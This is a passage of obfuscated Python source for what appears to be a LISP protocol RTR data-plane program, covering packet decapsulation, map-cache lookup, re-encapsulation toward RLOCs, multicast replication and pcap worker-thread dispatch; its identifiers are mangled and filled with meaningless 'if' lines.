O0II11iI111i1 = len ( packet )
oO = o00oo0 . stats
I1II1 ( "Send" , packet )
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
o00oo0 . last_refresh_time = time . time ( )
oO . increment ( O0II11iI111i1 )
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
I1ii11 = I1ii11 . print_address_no_iid ( )
o0oOoO00o . sendto ( packet , ( I1ii11 , 0 ) )
if 27 - 27: Ii1I
OO0000o ( Iii1iiIi1II , "Fast" )
return ( True )
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
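# (obfuscated) main RTR packet handler: decapsulate received LISP data packets, glean mappings,
# look up the map-cache, then re-encapsulate toward the selected RLOC or replicate via an RLE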
def ooO0o ( lisp_packet , thread_name ) :
global Oo0o , o000 , IiI1i
global o0oOoO00o , i1
global OOO0o0o
global iIiiI1
global oo0Ooo0
if 87 - 87: ooOoO0o
Iii1iiIi1II = OO0000o ( None , "RTR" )
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if ( oo0Ooo0 ) :
if ( oO0o0oooO0oO ( lisp_packet . packet ) ) : return
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
iI11I = lisp_packet
I1IIIiii1 = iI11I . is_lisp_packet ( iI11I . packet )
if 65 - 65: I11i / II111iiii * Ii1I . iII111i * oO0o % OOooOOo
if 69 - 69: ooOoO0o - OoO0O00 / i11iIiiIii + I1ii11iIi11i % OoooooooOO
if 73 - 73: Ii1I - I1Ii111
if 68 - 68: iII111i * OoooooooOO * iIii1I11I1II1 . II111iiii
if ( I1IIIiii1 == False ) :
O0Oo = iI11I . packet
I1iii , oO0o0O0Ooo0o , i1I , i1Ii11II = lisp . lisp_is_rloc_probe ( O0Oo , - 1 )
if ( O0Oo != I1iii ) :
if ( oO0o0O0Ooo0o == None ) : return
lisp . lisp_parse_packet ( Oo0o , I1iii , oO0o0O0Ooo0o , i1I , i1Ii11II )
return
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
iI11I . packet = lisp . lisp_reassemble ( iI11I . packet )
if ( iI11I . packet == None ) : return
if 59 - 59: OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if ( lisp . lisp_flow_logging ) : iI11I = copy . deepcopy ( iI11I )
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if ( I1IIIiii1 ) :
if ( iI11I . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
iI11I . print_packet ( "Receive-({})" . format ( thread_name ) , True )
iI11I . strip_outer_headers ( )
else :
if ( iI11I . decode ( False , None , None ) == None ) : return
iI11I . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
if 19 - 19: i11iIiiIii + iII111i % ooOoO0o
if 14 - 14: OoO0O00 . II111iiii . I11i / Ii1I % I1ii11iIi11i - ooOoO0o
if 67 - 67: I11i - OOooOOo . i1IIi
if 35 - 35: iII111i + ooOoO0o - oO0o . iII111i . IiII
if 87 - 87: OoOoOO00
if 25 - 25: i1IIi . OoO0O00 - OoOoOO00 / OoO0O00 % OoO0O00 * iIii1I11I1II1
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if ( I1IIIiii1 and iI11I . lisp_header . get_instance_id ( ) == 0xffffff ) :
O0OO0oOOo = lisp . lisp_control_header ( )
O0OO0oOOo . decode ( iI11I . packet )
if ( O0OO0oOOo . is_info_request ( ) ) :
OO0oO0o = lisp . lisp_info ( )
OO0oO0o . decode ( iI11I . packet )
OO0oO0o . print_info ( )
if 39 - 39: o0oOOo0O0Ooo * ooOoO0o + Ii1I * II111iiii
if 97 - 97: iIii1I11I1II1 + I11i + II111iiii % IiII % I1Ii111 % oO0o
if 21 - 21: I1IiiI / ooOoO0o % ooOoO0o - o0oOOo0O0Ooo
if 70 - 70: Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
oooo00o0o0o = OO0oO0o . hostname if ( OO0oO0o . hostname != None ) else ""
O0Oo00oO0O00 = iI11I . outer_source
II1i111Ii1i = iI11I . udp_sport
if ( lisp . lisp_store_nat_info ( oooo00o0o0o , O0Oo00oO0O00 , II1i111Ii1i ) ) :
OooOo0ooo ( Oo0o , oooo00o0o0o , O0Oo00oO0O00 , II1i111Ii1i )
if 32 - 32: II111iiii . Ii1I - iII111i * I1Ii111
else :
oO0o0O0Ooo0o = iI11I . outer_source . print_address_no_iid ( )
i1Ii11II = iI11I . outer_ttl
iI11I = iI11I . packet
if ( lisp . lisp_is_rloc_probe_request ( iI11I [ 28 : 29 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( iI11I [ 28 : 29 ] ) == False ) :
i1Ii11II = - 1
if 71 - 71: o0oOOo0O0Ooo % Ii1I - II111iiii * OoooooooOO
iI11I = iI11I [ 28 : : ]
lisp . lisp_parse_packet ( Oo0o , iI11I , oO0o0O0Ooo0o , 0 , i1Ii11II )
if 69 - 69: o0oOOo0O0Ooo / Oo0Ooo
return
if 43 - 43: I1ii11iIi11i . I1IiiI / OoooooooOO % OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if ( I1IIIiii1 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( iI11I . packet ) )
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
if 56 - 56: i11iIiiIii . o0oOOo0O0Ooo - I1IiiI * I11i
if 91 - 91: oO0o + OoooooooOO - i1IIi
o000OOooo0O = False
if ( iI11I . inner_dest . is_mac ( ) ) :
iI11I . packet = lisp . lisp_mac_input ( iI11I . packet )
if ( iI11I . packet == None ) : return
iI11I . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( iI11I . inner_version == 4 ) :
o000OOooo0O , iI11I . packet = lisp . lisp_ipv4_input ( iI11I . packet )
if ( iI11I . packet == None ) : return
iI11I . inner_ttl = iI11I . outer_ttl
elif ( iI11I . inner_version == 6 ) :
iI11I . packet = lisp . lisp_ipv6_input ( iI11I )
if ( iI11I . packet == None ) : return
iI11I . inner_ttl = iI11I . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 34 - 34: OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if ( iI11I . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( iI11I , ed = "decap" ) == False ) : return
iI11I . outer_source . afi = lisp . LISP_AFI_NONE
iI11I . outer_dest . afi = lisp . LISP_AFI_NONE
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( iI11I . inner_source , None ,
iI11I . outer_source )
if ( iIi11i1 ) :
iIIIi1i1I11i = iI11I . packet if ( o000OOooo0O ) else None
lisp . lisp_glean_map_cache ( iI11I . inner_source , iI11I . outer_source ,
iI11I . udp_sport , iIIIi1i1I11i )
if ( o000OOooo0O ) : return
if 55 - 55: Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
if 63 - 63: I1ii11iIi11i
O0O0OOOOoo = iI11I . inner_dest
if ( O0O0OOOOoo . is_multicast_address ( ) ) :
if ( O0O0OOOOoo . is_link_local_multicast ( ) ) :
i1II = lisp . green ( O0O0OOOOoo . print_address ( ) , False )
lisp . dprint ( "Drop link-local multicast EID {}" . format ( i1II ) )
return
if 2 - 2: II111iiii - OoO0O00 . IiII * iII111i / oO0o
OOo0 = False
oO00oo0o00o0o , IiIIIIIi , iiIii1IIi = lisp . lisp_allow_gleaning ( iI11I . inner_source , O0O0OOOOoo , None )
else :
OOo0 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( O0O0OOOOoo , None , None )
if 10 - 10: i11iIiiIii - o0oOOo0O0Ooo % iIii1I11I1II1
iI11I . gleaned_dest = OOo0
if 49 - 49: oO0o
if 83 - 83: oO0o % Oo0Ooo - o0oOOo0O0Ooo . iII111i / Oo0Ooo % I1ii11iIi11i
if 75 - 75: O0 % OoOoOO00 . IiII / IiII / OoO0O00
if 19 - 19: I1ii11iIi11i % i11iIiiIii . OOooOOo - Oo0Ooo / OoooooooOO
o00oo0 = lisp . lisp_map_cache_lookup ( iI11I . inner_source , iI11I . inner_dest )
if ( o00oo0 ) : o00oo0 . add_recent_source ( iI11I . inner_source )
if 66 - 66: OoO0O00 * Oo0Ooo
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if ( o00oo0 and ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION or
o00oo0 . eid . address == 0 ) ) :
II1I11IIi = lisp . lisp_db_for_lookups . lookup_cache ( iI11I . inner_source , False )
if ( II1I11IIi and II1I11IIi . secondary_iid ) :
OoOOo = iI11I . inner_dest
OoOOo . instance_id = II1I11IIi . secondary_iid
if 17 - 17: i1IIi
o00oo0 = lisp . lisp_map_cache_lookup ( iI11I . inner_source , OoOOo )
if ( o00oo0 ) :
iI11I . gleaned_dest = o00oo0 . gleaned
o00oo0 . add_recent_source ( iI11I . inner_source )
else :
OOo0 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( OoOOo , None ,
None )
iI11I . gleaned_dest = OOo0
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if ( o00oo0 == None and OOo0 ) :
lisp . lprint ( "Suppress Map-Request for gleaned EID {}" . format ( lisp . green ( iI11I . inner_dest . print_address ( ) , False ) ) )
if 48 - 48: II111iiii * OOooOOo * I1Ii111
return
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if ( o00oo0 == None or lisp . lisp_mr_or_pubsub ( o00oo0 . action ) ) :
if ( lisp . lisp_rate_limit_map_request ( iI11I . inner_dest ) ) : return
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
O00ooOo = ( o00oo0 and o00oo0 . action == lisp . LISP_SEND_PUBSUB_ACTION )
lisp . lisp_send_map_request ( Oo0o , Ooo ,
iI11I . inner_source , iI11I . inner_dest , None , O00ooOo )
if 80 - 80: o0oOOo0O0Ooo - OOooOOo + OoooooooOO
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "map-cache miss"
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 26 - 26: OoOoOO00 / Oo0Ooo - i1IIi + I11i
return
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if ( o00oo0 and o00oo0 . refresh ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( iI11I . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( o00oo0 . print_eid_tuple ( ) , False ) ) )
if 39 - 39: iIii1I11I1II1 - OoooooooOO
lisp . lisp_send_map_request ( Oo0o , Ooo ,
iI11I . inner_source , iI11I . inner_dest , None )
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
if 89 - 89: II111iiii / oO0o
o00oo0 . last_refresh_time = time . time ( )
o00oo0 . stats . increment ( len ( iI11I . packet ) )
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
IIiIi1 , Oo00O0ooOO , IiiI , i11ii , i11I1 , i1I1iI1iIi111i = o00oo0 . select_rloc ( iI11I , None )
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if ( IIiIi1 == None and i11I1 == None ) :
if ( i11ii == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
iI11I . send_packet ( o0oOoO00o , iI11I . inner_dest )
if 32 - 32: i11iIiiIii - I1Ii111
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "not an EID"
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 53 - 53: OoooooooOO - IiII
OO0000o ( Iii1iiIi1II , "RTR" )
return
if 87 - 87: oO0o . I1IiiI
O0ooOoO = "No reachable RLOCs found"
lisp . dprint ( O0ooOoO )
if 17 - 17: Ii1I . i11iIiiIii
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
return
if 63 - 63: oO0o
if ( IIiIi1 and IIiIi1 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "drop action"
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 36 - 36: IiII
return
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
iI11I . outer_tos = iI11I . inner_tos
iI11I . outer_ttl = iI11I . inner_ttl
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
if ( IIiIi1 ) :
iI11I . encap_port = Oo00O0ooOO
if ( Oo00O0ooOO == 0 ) : iI11I . encap_port = lisp . LISP_DATA_PORT
iI11I . outer_dest . copy_address ( IIiIi1 )
o00ooo = iI11I . outer_dest . afi_to_version ( )
iI11I . outer_version = o00ooo
if 31 - 31: O0 * o0oOOo0O0Ooo % o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
III1ii = iIiiI1 if ( o00ooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 41 - 41: ooOoO0o . Oo0Ooo + I1IiiI
iI11I . outer_source . copy_address ( III1ii )
if 100 - 100: Ii1I + OoO0O00
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
if ( lisp . lisp_trace_append ( iI11I , rloc_entry = i1I1iI1iIi111i ,
lisp_socket = O0Oo00oO0O00 ) == False ) : return
if 73 - 73: i1IIi - I1Ii111 % ooOoO0o / OoO0O00
if 40 - 40: I1ii11iIi11i * ooOoO0o - I1IiiI / IiII / i11iIiiIii
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
if ( iI11I . encode ( IiiI ) == None ) : return
if ( len ( iI11I . packet ) <= 1500 ) : iI11I . print_packet ( "Send" , True )
if 74 - 74: O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
iIiiIiiIi = i1 if o00ooo == 6 else o0oOoO00o
iI11I . send_packet ( iIiiIiiIi , iI11I . outer_dest )
if 40 - 40: o0oOOo0O0Ooo
elif ( i11I1 ) :
if 78 - 78: iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
I11i1iIiiIiIi = len ( iI11I . packet )
for I1i in i11I1 . rle_forwarding_list :
iI11I . outer_dest . copy_address ( I1i . address )
iI11I . encap_port = lisp . LISP_DATA_PORT if I1i . translated_port == 0 else I1i . translated_port
if 59 - 59: OoooooooOO . Ii1I / O0 - OOooOOo
if 1 - 1: IiII / IiII - i11iIiiIii
o00ooo = iI11I . outer_dest . afi_to_version ( )
iI11I . outer_version = o00ooo
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
III1ii = iIiiI1 if ( o00ooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
iI11I . outer_source . copy_address ( III1ii )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "replicate"
if ( lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 ) == False ) : return
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if ( iI11I . encode ( None ) == None ) : return
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
iI11I . print_packet ( "Replicate-to-L{}" . format ( I1i . level ) , True )
iI11I . send_packet ( o0oOoO00o , iI11I . outer_dest )
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
OO00OO0o0 = len ( iI11I . packet ) - I11i1iIiiIiIi
iI11I . packet = iI11I . packet [ OO00OO0o0 : : ]
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if ( lisp . lisp_flow_logging ) : iI11I = copy . deepcopy ( iI11I )
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
del ( iI11I )
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
OO0000o ( Iii1iiIi1II , "RTR" )
return
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
def I1I1iII1i ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
iI11I = lisp_thread . input_queue . get ( )
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
lisp_thread . input_stats . increment ( len ( iI11I ) )
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
lisp_thread . lisp_packet . packet = iI11I
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
ooO0o ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 66 - 66: I1IiiI - IiII
return
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
def o00Ooo0 ( thread ) :
O0O00O = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( O0O00O ) == thread . thread_number )
if 4 - 4: OoOoOO00 + Ii1I / oO0o
if 13 - 13: iII111i
if 80 - 80: Ii1I - o0oOOo0O0Ooo
if 41 - 41: o0oOOo0O0Ooo - Oo0Ooo * I1IiiI
if 82 - 82: OoO0O00 % o0oOOo0O0Ooo % OOooOOo / O0
if 94 - 94: I1ii11iIi11i + I1ii11iIi11i + OoooooooOO % ooOoO0o
if 7 - 7: iII111i
if 78 - 78: OOooOOo + iII111i . IiII
def OoIIi1iI ( parms , not_used , packet ) :
if ( o00Ooo0 ( parms [ 1 ] ) == False ) : return
if 92 - 92: OoO0O00 * ooOoO0o
i1iIIi1 = parms [ 0 ]
o0o0OoOOOOOo = parms [ 1 ]
Ii11iii1II1i = o0o0OoOOOOOo . number_of_worker_threads
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
o0o0OoOOOOOo . input_stats . increment ( len ( packet ) )
if 51 - 51: Oo0Ooo + oO0o / iII111i - i1IIi
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
I1I11ii = 4 if i1iIIi1 == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ I1I11ii : : ]
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
if ( Ii11iii1II1i ) :
o0o0O00 = o0o0OoOOOOOo . input_stats . packet_count % Ii11iii1II1i
o0o0O00 = o0o0O00 + ( len ( O0ooo00OOo00 ) - Ii11iii1II1i )
i1i = O0ooo00OOo00 [ o0o0O00 ]
i1i . input_queue . put ( packet )
else :
o0o0OoOOOOOo . lisp_packet . packet = packet
ooO0o ( o0o0OoOOOOOo . lisp_packet , o0o0OoOOOOOo . thread_name )
if 50 - 50: i1IIi % oO0o + I11i / oO0o + iIii1I11I1II1 % OoooooooOO
return
if 40 - 40: Ii1I % o0oOOo0O0Ooo
if 38 - 38: iIii1I11I1II1 + i11iIiiIii * OoO0O00 * ooOoO0o % OOooOOo
if 5 - 5: ooOoO0o - I1Ii111 + I1IiiI * O0 / Oo0Ooo - Ii1I
if 75 - 75: OoooooooOO - OOooOOo + o0oOOo0O0Ooo / iII111i % i11iIiiIii
if 10 - 10: OoO0O00
if 22 - 22: i11iIiiIii / O0
if 94 - 94: ooOoO0o * I11i - IiII . iIii1I11I1II1
if 66 - 66: ooOoO0o - OOooOOo * OoOoOO00 / oO0o * II111iiii * OoO0O00
def Ooo0O ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 34 - 34: ooOoO0o
